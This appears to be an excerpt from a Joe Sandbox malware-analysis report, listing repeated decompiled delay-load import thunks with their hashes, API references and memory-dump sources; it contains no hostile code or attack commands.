API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a5240e81086745b6638589f029db77526b059b0064f49598d2e63c2a80f9c527
Instruction ID: 02101887aa57e21ea650c9ba09306ca8021d3c8bfbd397271b1f266fcdcc6dcb
Opcode Fuzzy Hash: a5240e81086745b6638589f029db77526b059b0064f49598d2e63c2a80f9c527
Instruction Fuzzy Hash: 7EB0129577C102ED310C52047D07E7F123CCBC0B20330C02FF50EC5082DA484C085035

Uniqueness

Uniqueness Score: -1.00%

Function 0007DBFC Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007DBFC() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9be44, 0xc2084); // executed
				goto __eax;
			}

0x0007dbcd
0x0007dbd5
0x0007dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DBD5

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4abc42cc202132d30dd9fc32d9d0462e4080d9965982b1b172823a35775fa9f9
Instruction ID: aa377870d984bbfa1bebc02eb395b043657ad9d386396a3e5b1806a9b86392da
Opcode Fuzzy Hash: 4abc42cc202132d30dd9fc32d9d0462e4080d9965982b1b172823a35775fa9f9
Instruction Fuzzy Hash: 2FB0129577C002AD310C52047E07E7F133CCBC0B20330C02FF20EC4082DA884C055035

Uniqueness

Uniqueness Score: -1.00%

Function 0007DC24 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007DC24() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9be64, 0xc2178); // executed
				goto __eax;
			}

0x0007dc2e
0x0007dc36
0x0007dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DC36

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 15dad219ac5db8a4c089162c79ed6c2ee450311c0f6989c9f23d80e183271c92
Instruction ID: c933321b0c229c8c7d255a98c492b5bde690599d263bcf9e7e0d90145b6eeaf3
Opcode Fuzzy Hash: 15dad219ac5db8a4c089162c79ed6c2ee450311c0f6989c9f23d80e183271c92
Instruction Fuzzy Hash: 82B01295A6C202BD310C2200BF02D7E033CCBD0F20330C62FF60EE404195886C446039

Uniqueness

Uniqueness Score: -1.00%

Function 0007DC53 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007DC53() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9be64, 0xc217c); // executed
				goto __eax;
			}

0x0007dc2e
0x0007dc36
0x0007dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DC36

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5f37fc3dfd164c0f523a881f44704954f2ba6d20a255f70a0b052051a9f57e20
Instruction ID: 41e4148c80c7e4a2b4ee1e25a01e10efb57ab98aa5d795bcd091b1683d5ff509
Opcode Fuzzy Hash: 5f37fc3dfd164c0f523a881f44704954f2ba6d20a255f70a0b052051a9f57e20
Instruction Fuzzy Hash: BDB01295A6C202AD310C6204BD02E7E033CCBD4F20330C52FFA0ED4041D5886C045039

Uniqueness

Uniqueness Score: -1.00%

Function 0007DC5D Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0007DC5D() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0007DF59(_t3, _t4, _t8, _t9, _t10, 0x9be64, 0xc2170); // executed
				goto __eax;
			}

0x0007dc2e
0x0007dc36
0x0007dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007DC36

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 94a2fcca3a1ad635298c62da225286bec03e75346db61d9a14371ac032ca5c92
Instruction ID: 1c323461988e7cd41f2a498891f36752cb3676f404c0ce072cd2069696e511c7
Opcode Fuzzy Hash: 94a2fcca3a1ad635298c62da225286bec03e75346db61d9a14371ac032ca5c92
Instruction Fuzzy Hash: 6EB01295A7C202AD310C6204BD02E7E033CDBD0F20330C52FF60ED4041D9886C045039

Uniqueness

Uniqueness Score: -1.00%

Function 0007D8D9 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D8D9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a7aa863634b933225a376377c92badcc9a66c1a3d4627772c35153b1f88f849
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: 6a7aa863634b933225a376377c92badcc9a66c1a3d4627772c35153b1f88f849
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

Function 0007D91F Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D91F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ff23881ca3a4dc01c218c0fc371a9f43ed58790f613f1174251227ca589cceec
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: ff23881ca3a4dc01c218c0fc371a9f43ed58790f613f1174251227ca589cceec
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

Function 0007D93D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D93D() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 92cfde746858583e7973d21c75f38fba8d8b016aa656b789890cc77e03cae5ae
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: 92cfde746858583e7973d21c75f38fba8d8b016aa656b789890cc77e03cae5ae
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

Function 0007D951 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D951() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9e770162e61dd2ceba8bb706d9343d5609cde1bdb2678581e4c0bdfc847b862d
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: 9e770162e61dd2ceba8bb706d9343d5609cde1bdb2678581e4c0bdfc847b862d
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

Function 0007D95B Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D95B() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d7c589d6edf691bb5f751e9f3bfea8513cdc50d5966e8008cac61d47f5450e18
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: d7c589d6edf691bb5f751e9f3bfea8513cdc50d5966e8008cac61d47f5450e18
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

Function 0007D965 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D965() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3a8f9d4e382f5e1b5f438744dd8a2872eab5efdfe280536c953a3bedf6648065
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: 3a8f9d4e382f5e1b5f438744dd8a2872eab5efdfe280536c953a3bedf6648065
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

Function 0007D96F Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D96F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dd1e31627c2888fab3db13fc034371516b58e65c87a7bfb2ae34466a621fa3e8
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: dd1e31627c2888fab3db13fc034371516b58e65c87a7bfb2ae34466a621fa3e8
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

Function 0007D979 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D979() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 58bd38b99e5772978a2961f7c2fcf1d6bd1995284851e8ab261ac48a5e42f1bf
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: 58bd38b99e5772978a2961f7c2fcf1d6bd1995284851e8ab261ac48a5e42f1bf
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

Function 0007D983 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D983() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1b7ba5c5f929502e253e37e3565a663948b65316d8347894d0adfd2d0e4a5473
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: 1b7ba5c5f929502e253e37e3565a663948b65316d8347894d0adfd2d0e4a5473
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

Function 0007D98D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0007D98D() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x9bdc4); // executed
				E0007DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0007d89e
0x0007d8a3
0x0007d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0007D8A3

Part of subcall function 0007DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0007DFD6
Part of subcall function 0007DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0007DFE7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0b3185b97073dcb0ca3ebbcf91f785188a01118f1557e141b24e8cc0087b71b8
Instruction ID: f3e01355067a5d8995bb05e92ab99455e08667c84c03402e0fd5f260390083db
Opcode Fuzzy Hash: 0b3185b97073dcb0ca3ebbcf91f785188a01118f1557e141b24e8cc0087b71b8
Instruction Fuzzy Hash: 7CA0129196D0027C300821007D12C3A062CCEC0B20330C41FF04F940C1A84428045435

Uniqueness

Uniqueness Score: -1.00%

